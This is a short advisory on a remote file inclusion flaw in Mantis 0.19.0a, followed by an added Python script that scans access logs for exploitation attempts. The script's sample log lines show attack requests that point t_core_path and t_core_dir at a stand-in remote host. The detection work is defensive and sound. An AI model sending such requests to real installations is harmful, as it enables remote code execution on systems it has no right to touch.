[Original text] PHP remote file inclusion vulnerability in Mantis 0.19.0a allows remote attackers to execute arbitrary PHP code by modifying the (1) t_core_path parameter to bug_api.php or (2) t_core_dir parameter to relationship_api.php to reference a URL on a remote web server that contains the code.
Mantis contains a flaw that allows an attacker to inject arbitrary PHP code. The issue is due to the "t_core_dir" variable in the bug_api.php script not properly sanitizing input. If an attacker supplies the URL of an arbitrary web site and PHP script, that script will be executed with the privileges and in the context of the vulnerable site.
Upgrade to version 0.19.0a2 (Alpha) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
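For checking whether an unpatched installation was probed, the following added example (not part of the original advisory or of Mantis) scans web server access logs for requests that set the two parameters named above on the two affected scripts. It assumes combined-format access logs; the function names, the `/app/` path prefix and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter names taken from the advisory text above.
SCRIPTS = {"bug_api.php", "relationship_api.php"}
PARAMS = {"t_core_path", "t_core_dir"}

# Client, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A value starting with a URL scheme or "//" points the include at another host or wrapper.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded URLs are still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (client, path, parameter, kind, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if url.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name not in PARAMS:
                continue
            # These are internal path variables; any request setting them is worth review.
            kind = "remote-include" if REMOTE_RE.match(fully_decode(value)) else "param-override"
            findings.append((client, url.path, name, kind, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /app/bug_api.php?t_core_path=http://files.example.invalid/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app/relationship_api.php?t_core_dir=http%253A%252F%252Ffiles.example.invalid%252F HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /app/bug_api.php?t_core_dir=./core/ HTTP/1.1" 200 128',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /app/view.php?id=12 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that a request was made; whether code ran depends on the installed version and the PHP configuration, so treat findings on a pre-0.19.0a2 installation as a reason to investigate further.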